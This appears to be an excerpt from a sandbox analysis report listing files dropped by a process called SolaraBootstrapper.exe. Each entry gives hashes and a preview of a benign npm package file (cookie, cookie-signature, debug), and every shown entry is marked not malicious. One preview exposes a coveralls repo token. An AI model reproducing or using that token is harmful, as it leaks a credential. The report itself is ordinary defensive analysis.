                                                  Preview:1.0.6 / 2015-02-03.==================..* use `npm test` instead of `make test` to run tests.* clearer assertion messages when checking input...1.0.5 / 2014-09-05.==================..* add license to package.json..1.0.4 / 2014-06-25.==================.. * corrected avoidance of timing attacks (thanks @tenbits!)..1.0.3 / 2014-01-28.==================.. * [incorrect] fix for timing attacks..1.0.2 / 2014-01-28.==================.. * fix missing repository warning. * fix typo in test..1.0.1 / 2013-04-15.==================.. * Revert "Changed underlying HMAC algo. to sha512.". * Revert "Fix for timing attacks on MAC verification."..0.0.1 / 2010-01-03.==================.. * Initial release.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1490
                                                  Entropy (8bit):5.34901447399893
                                                  Encrypted:false
                                                  SSDEEP:24:HofRPHOPUPaqiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFz:Hof1OM3iJfxfPvGt7ICMPH+sfINi3OM9
                                                  MD5:57AE8B42DE3DD0C1F22D5F4CF191E15A
                                                  SHA1:EEDF0DED937F36B8FF5054A5B08CF38FDC241DEB
                                                  SHA-256:1621ED10D0B2F865EB8608E0474A356CF7A9737A384B6593B61B30A9F6E50366
                                                  SHA-512:C725E8C112AE4FFB9593C512636D1C9208CF10BFB055901A00D0DC892C95617AD3300829256972BB3996914B085D0A862207D214D0F9342741135D7E1E0ECB91
                                                  Malicious:false
                                                  Preview:.# cookie-signature.. Sign and unsign cookies...## Example..```js.var cookie = require('cookie-signature');..var val = cookie.sign('hello', 'tobiiscool');.val.should.equal('hello.DGDUkGlIkCzPz+C0B064FNgHdEjox7ch8tOBGslZ5QI');..var val = cookie.sign('hello', 'tobiiscool');.cookie.unsign(val, 'tobiiscool').should.equal('hello');.cookie.unsign(val, 'luna').should.be.false;.```..## License ..(The MIT License)..Copyright (c) 2012 LearnBoost &lt;tj@learnboost.com&gt;..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substanti
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1230
                                                  Entropy (8bit):4.911262279846917
                                                  Encrypted:false
                                                  SSDEEP:24:y8EKm6LQiR88N3tHEonxHm5FdLQiMrUvN28wBhydQXu:XEP6L588NhEonxG57LUreNnahydQXu
                                                  MD5:A9634AA95D321B9A6D90BEC5D3D23937
                                                  SHA1:BB5C2C0A463AA10074CAF991F67681231B1F0C21
                                                  SHA-256:8D762862020064468B4AF17E561EE1EE29D9D55311A1C19D958C4FF2BE912963
                                                  SHA-512:214E27EDB4367AA2EF322C4D857A918EBD57BC825646184F90FA6911F830B3755FCE1FDFF30A5D231EA11BA4DDD82B4F2AFC36451289F0B4334C445E9A26DC48
                                                  Malicious:false
                                                  Preview:/**. * Module dependencies.. */..var crypto = require('crypto');../**. * Sign the given `val` with `secret`.. *. * @param {String} val. * @param {String} secret. * @return {String}. * @api private. */..exports.sign = function(val, secret){. if ('string' != typeof val) throw new TypeError("Cookie value must be provided as a string.");. if ('string' != typeof secret) throw new TypeError("Secret string must be provided.");. return val + '.' + crypto. .createHmac('sha256', secret). .update(val). .digest('base64'). .replace(/\=+$/, '');.};../**. * Unsign and decode the given `val` with `secret`,. * returning `false` if the signature is invalid.. *. * @param {String} val. * @param {String} secret. * @return {String|Boolean}. * @api private. */..exports.unsign = function(val, secret){. if ('string' != typeof val) throw new TypeError("Signed cookie string must be provided.");. if ('string' != typeof secret) throw new TypeError("Secret string must be provided.");. var str = va
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):492
                                                  Entropy (8bit):4.665449318892376
                                                  Encrypted:false
                                                  SSDEEP:12:UJ18L3EnvI8AacPEMM9Gf6Pt0oCQWNWjVzUPnP6gv:UJ1E3bPj/2xCQWEpG
                                                  MD5:076C53814237236A9D1AA999F33EE501
                                                  SHA1:EB071423205FC35573E714BAA755E3A9E900A979
                                                  SHA-256:AB66777A673AE096D6B5AA51B5EDB46B84E6FCD85DC03358C35576E3DF0464F5
                                                  SHA-512:D5FEEE2E6C8AF31560A3141EBE4254CE66972DA9B9E3463EAFCEA214F49131E325136503DE3F0FA76B454F63EBFDBF5D599CAF558978AACA5A1656C2C7C8EEC1
                                                  Malicious:false
                                                  Preview:{. "name": "cookie-signature",. "version": "1.0.6",. "description": "Sign and unsign cookies",. "keywords": ["cookie", "sign", "unsign"],. "author": "TJ Holowaychuk <tj@learnboost.com>",. "license": "MIT",. "repository": { "type": "git", "url": "https://github.com/visionmedia/node-cookie-signature.git"},. "dependencies": {},. "devDependencies": {. "mocha": "*",. "should": "*". },. "scripts": {. "test": "mocha --require should --reporter spec". },. "main": "index".}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3189
                                                  Entropy (8bit):4.721880816490292
                                                  Encrypted:false
                                                  SSDEEP:96:p7uDZLXwuBRE8i3gN62iNKqNxvGOrL8Xt:oQxZ55A
                                                  MD5:4E6BE16D80C3254F3EAF7F246F2967D5
                                                  SHA1:053CA9983A27FFE587F35AAE1F52868B1D743311
                                                  SHA-256:01B9F8C4E28CCFB807D66D3787F68AFCBA8E27429AECEC7B50F8B61F960F104A
                                                  SHA-512:F89B1A467604BE24C214D231757FF219F9435E8122B64EA6A46612F2430826CC81CC2F31F2F3A784EC23608D688FD0C55D7FF8935B08E89F91B2E8FB73ACAD49
                                                  Malicious:false
                                                  Preview:0.6.0 / 2023-11-06.==================.. * Add `partitioned` option..0.5.0 / 2022-04-11.==================.. * Add `priority` option. * Fix `expires` option to reject invalid dates. * perf: improve default decode speed. * perf: remove slow string split in parse..0.4.2 / 2022-02-02.==================.. * perf: read value only when assigning in parse. * perf: remove unnecessary regexp in parse..0.4.1 / 2020-04-21.==================.. * Fix `maxAge` option to reject invalid values..0.4.0 / 2019-05-15.==================.. * Add `SameSite=None` support..0.3.1 / 2016-05-26.==================.. * Fix `sameSite: true` to work with draft-7 clients. - `true` now sends `SameSite=Strict` instead of `SameSite`..0.3.0 / 2016-05-26.==================.. * Add `sameSite` option. - Replaces `firstPartyOnly` option, never implemented by browsers. * Improve error message when `encode` is not a function. * Improve error message when `expires` is not a `Date`..0.2.4 / 2016-05-20.==========
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1175
                                                  Entropy (8bit):5.190518136258143
                                                  Encrypted:false
                                                  SSDEEP:24:ZNNiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFz:HNiJfxfPvGt7ICMPH+sfINi3OMFz
                                                  MD5:BC85B43B6F963E8AB3F88E63628448CA
                                                  SHA1:19188F18A6A18F0E02388529EC905BBBFA564F41
                                                  SHA-256:C02110EEDC16C7114F1A9BDC026C65626CE1D9C7E27FD51A8E0FEEE8A48A6858
                                                  SHA-512:49CAF8A6245F56AEEAFAF410053A72586BAC5F9943053CE8F86B6B9F20DCC8D9D553C5EEDA69075CA2951D4FA49E5F68C753C1F06DD556982307353478187C10
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2012-2014 Roman Shtylman <shtylman@gmail.com>.Copyright (c) 2015 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES O
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):11769
                                                  Entropy (8bit):5.114793125993712
                                                  Encrypted:false
                                                  SSDEEP:192:gC6nTuN1D5AKINreMblbEnV4zrhw5lPOkRHPL+gqdd7SHlxlmzrMtCT8+cNkq:QuN1D+9eMbFES36RHPL+b8xQTimq
                                                  MD5:683E2286B5CB5BD1B4B36866F573A29F
                                                  SHA1:A4D68D3F76512C87CFBCF6A6E553876D1980A6E8
                                                  SHA-256:BA8B36C7D860D6EF37887B6EF496A486E91AEFE5229F65157CC8B44725B9BEC5
                                                  SHA-512:8F6FA08988CABC1D90F6523D3CA2D09E89622AECBF2E954E67241A076F43D3DB0ECA3BB16B28CD0259E851305631F8DC42299A78AA400CE0623AC90B7C56C218
                                                  Malicious:false
                                                  Preview:# cookie..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-image]][node-url].[![Build Status][ci-image]][ci-url].[![Coverage Status][coveralls-image]][coveralls-url]..Basic HTTP cookie parser and serializer for HTTP servers...## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install cookie.```..## API..```js.var cookie = require('cookie');.```..### cookie.parse(str, options)..Parse an HTTP `Cookie` header string and returning an object of all cookie name-value pairs..The `str` argument is the string representing a `Cookie` header value and `options` is an.optional object containing additional parsing options...```js.var cookies = cookie.parse('foo=bar; equation=E%3Dmc%5E2');.// { foo: 'bar', equation
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1180
                                                  Entropy (8bit):4.461471767918752
                                                  Encrypted:false
                                                  SSDEEP:24:1NR7oSZ8gGzR+KHbH1aKW/DF925a/7kJyEyF0eOCYunEfu7WR:1N7SFHD1f7a/7xPYun7WR
                                                  MD5:440BDB14ABCAA77716CE2626BFA310ED
                                                  SHA1:C2F87463A8FA153254C21500E1B906C64A813AD9
                                                  SHA-256:299F5E632CCB1AE2D74F95DAC09DB13D7FF46C482663B67032E3E72CBE376276
                                                  SHA-512:5AA058B78CEABD8B0C9B9453023706C916E7277C482ECD3621CE3DA3623702FBF540114D2E904301FF30BF36C38C5AF5D29940021F3C0AD9BC267D4D2861681C
                                                  Malicious:false
                                                  Preview:# Security Policies and Procedures..## Reporting a Bug..The `cookie` team and community take all security bugs seriously. Thank.you for improving the security of the project. We appreciate your efforts and.responsible disclosure and will make every effort to acknowledge your.contributions...Report security bugs by emailing the current owner(s) of `cookie`. This.information can be found in the npm registry using the command.`npm owner ls cookie`..If unsure or unable to get the information from the above, open an issue.in the [project issue tracker](https://github.com/jshttp/cookie/issues).asking for the current contact information...To ensure the timely response to your report, please ensure that the entirety.of the report is contained within the email body and not solely behind a web.link or an attachment...At least one owner will acknowledge your email within 48 hours, and will send a.more detailed response within 48 hours indicating the next steps in handling.your report. After the i
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5281
                                                  Entropy (8bit):4.84462495731072
                                                  Encrypted:false
                                                  SSDEEP:96:sdChhqAp9V3vGycd6mDxj64MRHMqwa+8g+3ndAVVJiN9B2RQhAh++xctZt1Y1JzI:G+hqmP3ObxlvodnwRQhAU+it9szI
                                                  MD5:DB5DEDA6183845891FE9B5667CDE042D
                                                  SHA1:EE23AB87C951B0D3E3CDF1D6072A126A84491335
                                                  SHA-256:9FD02358EABDF6C27B388DFDFF94061655620A352253BFC5B01EE4CC30CA36B5
                                                  SHA-512:1B6957F2EF28C5D4E14E02E8D6FEA08D7210C0F2EB9DE4788799FCC57D806998448622145CA45F0F605DB447D97BE982C62211535BF421D8C02D9E384E7DB339
                                                  Malicious:false
                                                  Preview:/*!. * cookie. * Copyright(c) 2012-2014 Roman Shtylman. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module exports.. * @public. */..exports.parse = parse;.exports.serialize = serialize;../**. * Module variables.. * @private. */..var __toString = Object.prototype.toString../**. * RegExp to match field-content in RFC 7230 sec 3.2. *. * field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ]. * field-vchar = VCHAR / obs-text. * obs-text = %x80-FF. */..var fieldContentRegExp = /^[\u0009\u0020-\u007e\u0080-\u00ff]+$/;../**. * Parse a cookie header.. *. * Parse the given cookie header string into an object. * The object has the various cookies as keys(names) => values. *. * @param {string} str. * @param {object} [options]. * @return {object}. * @public. */..function parse(str, options) {. if (typeof str !== 'string') {. throw new TypeError('argument str must be a string');. }.. var obj = {}. var opt = options || {};. var dec =
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1142
                                                  Entropy (8bit):4.870340029772203
                                                  Encrypted:false
                                                  SSDEEP:24:Dq61XTNyxV3fP6iaYWEwq1EabkB6T+lwZKLAw23VV105P6u:DqWXpUV3fSia/E1eabG0+qo0wmV/03
                                                  MD5:D55AA6BD2733CA1031186952D1485F43
                                                  SHA1:DD82A1CEA772234696F0489AECACFE9AA8FF943E
                                                  SHA-256:E740B0E5656B2029FB858BC93B10312DFF16374283A2ECD9CAA90848190DFF88
                                                  SHA-512:E4324126170C2A6D4E01F7BD8774A26BABC5ABFF86692F283BF691E2B435F6B6F2823179E080AABDE20D368BB26707A726D54C8D64E7838E215CEF074C499598
                                                  Malicious:false
                                                  Preview:{. "name": "cookie",. "description": "HTTP server cookie parsing and serialization",. "version": "0.6.0",. "author": "Roman Shtylman <shtylman@gmail.com>",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>". ],. "license": "MIT",. "keywords": [. "cookie",. "cookies". ],. "repository": "jshttp/cookie",. "devDependencies": {. "beautify-benchmark": "0.2.4",. "benchmark": "2.1.4",. "eslint": "8.53.0",. "eslint-plugin-markdown": "3.0.1",. "mocha": "10.2.0",. "nyc": "15.1.0",. "safe-buffer": "5.2.1",. "top-sites": "1.1.194". },. "files": [. "HISTORY.md",. "LICENSE",. "README.md",. "SECURITY.md",. "index.js". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "bench": "node benchmark/index.js",. "lint": "eslint .",. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-ci": "nyc --reporter=lcov --reporter=text npm test",. "test-cov": "nyc --reporter=html --reporter=text np
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):46
                                                  Entropy (8bit):4.958344564752663
                                                  Encrypted:false
                                                  SSDEEP:3:ivutBdRgtojoV3Mv:ivuvdydV3Mv
                                                  MD5:55352D85883681DF5F0FA66D3F32A872
                                                  SHA1:90709E4FB4CE17729974B3A140CCBF330519835C
                                                  SHA-256:64E6B64F19837A76C30865579AABDDE1A825729AE0204BA73BA6DE77296CE18E
                                                  SHA-512:BD3F23A4D44A5DF32AE36277D55BF3335D4E8A2954B2AE2DB3167996058B8C6D1E74C2DD9DD2C934BC1D70C15C026FC075A53D47E7B856750047FB86F6B22F58
                                                  Malicious:false
                                                  Preview:repo_token: SIAeZjKYlHK74rbcFvNHMUzjRiMpflxve.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):180
                                                  Entropy (8bit):4.301685598072847
                                                  Encrypted:false
                                                  SSDEEP:3:rtwFlZWyLQ+PL9FqnXxueHFpTJMHF9LTRI+QMHEHukERGPRiJAdRTTCFQGK1AMKn:rtw++hF+huwiC+QGMukELAdBN5K
                                                  MD5:F69AF9893C473D8E925169156A42F70C
                                                  SHA1:8D154AEDDF66A7BCBD433E3C619F76BB0D920AE2
                                                  SHA-256:7B7D5A5736DDDAE0E7CF1C06CDF41DDD9F98E73DB8F57A18FE4C9BD0F52F9AA3
                                                  SHA-512:4239496B31071B799E30DCC18A05E6E95279799418A97DD57141A4D0F07EE0DDB057E09CB13C30C400202474B61E71175495B3CC411747ADE097D12F4EE87DD0
                                                  Malicious:false
                                                  Preview:{. "env": {. "browser": true,. "node": true. },. "rules": {. "no-console": 0,. "no-empty": [1, { "allowEmptyCatch": true }]. },. "extends": "eslint:recommended".}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):72
                                                  Entropy (8bit):4.255848091329463
                                                  Encrypted:false
                                                  SSDEEP:3:vKXRvRzRxUmJK6OXBd2ffYR:vQvHvjIEm
                                                  MD5:B0205B7904BEF0AD0B403FBCF4F57434
                                                  SHA1:90FEF7CC1058BD0F85B0959C4FCD49230A29593E
                                                  SHA-256:F4580152A6F48954B44CB2A0A002FA500467663DB5A6DC8E796B52533DC04EC1
                                                  SHA-512:FD7F6D36580B9F9D94247FB4EC398C7BFE7715399D11A1D6FA1EFC51E95405EE8F5E6559C5861B0D032AB425F0DE24C7E84BB4C03594E715FA21CD47461A69B4
                                                  Malicious:false
                                                  Preview:support.test.examples.example.*.sock.dist.yarn.lock.coverage.bower.json.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):140
                                                  Entropy (8bit):4.230134094195066
                                                  Encrypted:false
                                                  SSDEEP:3:M6FvLgCFq/zvRLjot6/FyFwxIFQZWv:ppgCcLvRL8INyFWIFQov
                                                  MD5:75C6CBB25B2A5720C8663637A2678879
                                                  SHA1:E87A69A064F6A95B166333D46B919AFBC5487F59
                                                  SHA-256:839E44EE0A96A3E302DC6472800B51822982B77D08F19200AB2CC70534781FD8
                                                  SHA-512:9FEE1C0DF8C2098D418BA0816E47EEFE46063E5DC62D5B9B9B2DC951968627F4E5B53B7C27F42FB6C8CAAC0AF10E3BD4C32526913C3B467E6059237601A77DE0
                                                  Malicious:false
                                                  Preview:.language: node_js.node_js:. - "6". - "5". - "4"..install:. - make node_modules..script:. - make lint. - make test. - make coveralls.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):11707
                                                  Entropy (8bit):5.135546321275976
                                                  Encrypted:false
                                                  SSDEEP:192:YN/f0WRrJMcqETq2JRkAbvugBtQsxdsE/6uXIveiGIF6Ta6:YNUkMcq/iRkKug/QsxOEyuYveiPCR
                                                  MD5:504A70C7EB9EBA0C4B26965CF4D252C6
                                                  SHA1:C35E6A85B4A8732EC8AF63BEEA964483E1B2DD94
                                                  SHA-256:D8C1B0717964E189010B13521379C3B970EECC889CB8B788AC21D8DD85247165
                                                  SHA-512:CB9836AF90C63DEEAF5C2DD5085685B3213B3579337D69F9B44DFB5C61C6BFFA5A940C4D9E9B8BB8DF4A845C0F7008077FA35598B27FE45079FB921FE8528E50
                                                  Malicious:false
                                                  Preview:.2.6.9 / 2017-09-22.==================.. * remove ReDoS regexp in %o formatter (#504)..2.6.8 / 2017-05-18.==================.. * Fix: Check for undefined on browser globals (#462, @marbemac)..2.6.7 / 2017-05-16.==================.. * Fix: Update ms to 2.0.0 to fix regular expression denial of service vulnerability (#458, @hubdotcom). * Fix: Inline extend function in node implementation (#452, @dougwilson). * Docs: Fix typo (#455, @msasad)..2.6.5 / 2017-04-27.==================. . * Fix: null reference check on window.documentElement.style.WebkitAppearance (#447, @thebigredgeek). * Misc: clean up browser reference checks (#447, @thebigredgeek). * Misc: add npm-debug.log to .gitignore (@thebigredgeek)...2.6.4 / 2017-04-20.==================.. * Fix: bug that would occure if process.env.DEBUG is a non-string value. (#444, @LucianBuzzo). * Chore: ignore bower.json in npm installations. (#437, @joaovieira). * Misc: update "ms" to v0.7.3 (@tootallnate)..2.6.3 / 2017-03-13.=======
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1107
                                                  Entropy (8bit):5.12256218715534
                                                  Encrypted:false
                                                  SSDEEP:24:kr4/HHHP0yPP3gtqHw1hH9MPHcv48Ok4MdboHoqDFz:k8/vlPvERdMPHhIjcHoOFz
                                                  MD5:DDD815A475E7338B0BE7A14D8EE35A99
                                                  SHA1:D16A2786962571280A11CAE01D5E59AEB1351C9A
                                                  SHA-256:98C970DE440DCFC77471610AEC2377C9D9B0DB2B3BE6D1ADD524A586E1D7F422
                                                  SHA-512:47B612EF4E93F1AF62891E295E9FBAC05E02CF1726F56C36FAD5314376E28CBCAF7C8355527BC0BDA54C26CBE097BC8CA5CB4F79AA9E3AB6F1D875DCA41D4AAC
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014 TJ Holowaychuk <tj@vision-media.ca>..Permission is hereby granted, free of charge, to any person obtaining a copy of this software .and associated documentation files (the 'Software'), to deal in the Software without restriction, .including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, .and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or substantial .portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT .LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. .IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, .WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWIS
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1059
                                                  Entropy (8bit):5.556812469512553
                                                  Encrypted:false
                                                  SSDEEP:24:0VZxRBMWsQWs17QHHi0cEsvnxLMkcyacxH6kjS4zwbjhNav+yx6bn/JygknmhrU:mZjLsQWs5GHildvnWk5ach6kb1un/Jy/
                                                  MD5:F8739CAB4AE015EE84820716A8AC193A
                                                  SHA1:89EB5A7B8385734EF7FF4F910D4605CDE0BC12FD
                                                  SHA-256:F6466507E02C62F14E477AF08E4A13EC883152B54D87FEEFFB8F0D6DE6E9013B
                                                  SHA-512:EF875B744303169B5600CE5C42A0791A38BF933983F5011BA2EA9560AC5449E6FE9D4AE706EFC970B40096B9533A425FFC53265353EAD256BE44606790688BF1
                                                  Malicious:false
                                                  Preview:# get Makefile directory name: http://stackoverflow.com/a/5982798/376773.THIS_MAKEFILE_PATH:=$(word $(words $(MAKEFILE_LIST)),$(MAKEFILE_LIST)).THIS_DIR:=$(shell cd $(dir $(THIS_MAKEFILE_PATH));pwd)..# BIN directory.BIN := $(THIS_DIR)/node_modules/.bin..# Path.PATH := node_modules/.bin:$(PATH).SHELL := /bin/bash..# applications.NODE ?= $(shell which node).YARN ?= $(shell which yarn).PKG ?= $(if $(YARN),$(YARN),$(NODE) $(shell which npm)).BROWSERIFY ?= $(NODE) $(BIN)/browserify...FORCE:..install: node_modules..node_modules: package.json..@NODE_ENV= $(PKG) install..@touch node_modules..lint: .FORCE..eslint browser.js debug.js index.js node.js..test-node: .FORCE..istanbul cover node_modules/mocha/bin/_mocha -- test/**.js..test-browser: .FORCE..mkdir -p dist...@$(BROWSERIFY) \...--standalone debug \.... > dist/debug.js...karma start --single-run..rimraf dist..test: .FORCE..concurrently \..."make test-node" \..."make test-browser"..coveralls:..cat ./coverage/lcov.info | ./node_modules/cover
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (475)
                                                  Category:dropped
                                                  Size (bytes):17918
                                                  Entropy (8bit):5.215109378560089
                                                  Encrypted:false
                                                  SSDEEP:192:H6R76Zbt7yJXxRrHQbSb4BDyzWM/XAoxIM6jep2JVhgu9o8ZT/ueXBEgdjaSjVwo:U7DxRrqB4rxIMajJVeqaxq3
                                                  MD5:03694893D682191B3C893701BA6F4A55
                                                  SHA1:38096A9C10830714695A97A8501B817EB0A7534E
                                                  SHA-256:CDA3DBD285A2B65894758565A565E7BC2E7C3696225AF7B5BD01454240DF0AEA
                                                  SHA-512:3B80EA8A912EC4DDF1A1E2FC3F3EBD8F4BC6F591F9B2732694CB5627C549D7911C1A6EB82AB68AC025E13E090B3E39B8B4AE66A9159F45696B6343CE76213F54
                                                  Malicious:false
                                                  Preview:# debug.[![Build Status](https://travis-ci.org/visionmedia/debug.svg?branch=master)](https://travis-ci.org/visionmedia/debug) [![Coverage Status](https://coveralls.io/repos/github/visionmedia/debug/badge.svg?branch=master)](https://coveralls.io/github/visionmedia/debug?branch=master) [![Slack](https://visionmedia-community-slackin.now.sh/badge.svg)](https://visionmedia-community-slackin.now.sh/) [![OpenCollective](https://opencollective.com/debug/backers/badge.svg)](#backers) .[![OpenCollective](https://opencollective.com/debug/sponsors/badge.svg)](#sponsors)....A tiny node.js debugging utility modelled after node core's debugging technique...**Discussion around the V3 API is under way [here](https://github.com/visionmedia/debug/issues/370)**..## Installation..```bash.$ npm install debug.```..## Usage..`debug` exposes a function; simply pass this function the name of your module, and it will return a decorated version of `console.error` for you to pass debug statements to. This will
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):321
                                                  Entropy (8bit):4.465851094571166
                                                  Encrypted:false
                                                  SSDEEP:6:vX6aLWJd/k9ExRcUS1YpuXH+HQ6MEwHQJIxKHlOXdHhXdBA7SF9CVNkQ:SaLAh3XI1YpYY5MNsSKOdhdBAmCJ
                                                  MD5:510AF4D67A35446E6DCCEA1429399C3A
                                                  SHA1:4963889B7905ABD5A8955B8D27C3079E2D449564
                                                  SHA-256:2E5AB9AE90F41699E00D00FCA16765024F437300A0568C2208669CC281BA7656
                                                  SHA-512:BB8D1E0E4C99A82D32FB40DAA9A79E2ABF3A3F495B3DC9AFA883021110B3CA9EB93E052D71E98D6494722DF947EC280D66F4BCA36BB0AE975F05D710E8C47415
                                                  Malicious:false
                                                  Preview:{. "name": "debug",. "repo": "visionmedia/debug",. "description": "small debugging utility",. "version": "2.6.9",. "keywords": [. "debug",. "log",. "debugger". ],. "main": "src/browser.js",. "scripts": [. "src/browser.js",. "src/debug.js". ],. "dependencies": {. "rauchg/ms.js": "0.7.1". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1736
                                                  Entropy (8bit):4.788611478595854
                                                  Encrypted:false
                                                  SSDEEP:48:NV32rh/3Q68+ZPnSBKAjzdKT9lqgGU2HHPgb5LtGg:n32V/3p8+ZPcKo1fg
                                                  MD5:06F3BABBDC43C6C4DD1493B6C1AF32E2
                                                  SHA1:93FEF7CF3ED6F04D2CFC3CD0B8D5D972D35CFD29
                                                  SHA-256:2430869ADB61A5E24A3612110A9B49A948E6DB43AB7E947C003A9C19C478E609
                                                  SHA-512:AD65132ED6F675F6F318FEFA36F4E6C23F3FF4DC47D02575F6D5BEF7B062A2E90AEA1A43DD5327C2565BE3D834C969FF2AE3EFDB2ADD4A958882A6F056F659EA
                                                  Malicious:false
                                                  Preview:// Karma configuration.// Generated on Fri Dec 16 2016 13:09:51 GMT+0000 (UTC)..module.exports = function(config) {. config.set({.. // base path that will be used to resolve all patterns (eg. files, exclude). basePath: '',... // frameworks to use. // available frameworks: https://npmjs.org/browse/keyword/karma-adapter. frameworks: ['mocha', 'chai', 'sinon'],... // list of files / patterns to load in the browser. files: [. 'dist/debug.js',. 'test/*spec.js'. ],... // list of files to exclude. exclude: [. 'src/node.js'. ],... // preprocess matching files before serving them to the browser. // available preprocessors: https://npmjs.org/browse/keyword/karma-preprocessor. preprocessors: {. },.. // test results reporter to use. // possible values: 'dots', 'progress'. // available reporters: https://npmjs.org/browse/keyword/karma-reporter. reporters: ['progress'],... // web server port. port: 9876,... // enable /
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):40
                                                  Entropy (8bit):4.362814895472354
                                                  Encrypted:false
                                                  SSDEEP:3:3BBBbJCfv:xBBa
                                                  MD5:79F3814F32362C1C6F9DBB8A1E3B01BF
                                                  SHA1:AA7655EE80C9A485313675F9379C2F18D33EA061
                                                  SHA-256:996B381F353555CB172EBB2802BB2A7323442FF67B7B530CC26834058D7F31A2
                                                  SHA-512:61367EC2AFF9349E203A295FE1BC28FADDC6D80B556660F56EA49D6625D6228212FE82D7398114509A3B8D9AD4026429F0EBB849579C7481928F47F37C8632D5
                                                  Malicious:false
                                                  Preview:module.exports = require('./src/node');.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1138
                                                  Entropy (8bit):4.7852828549554145
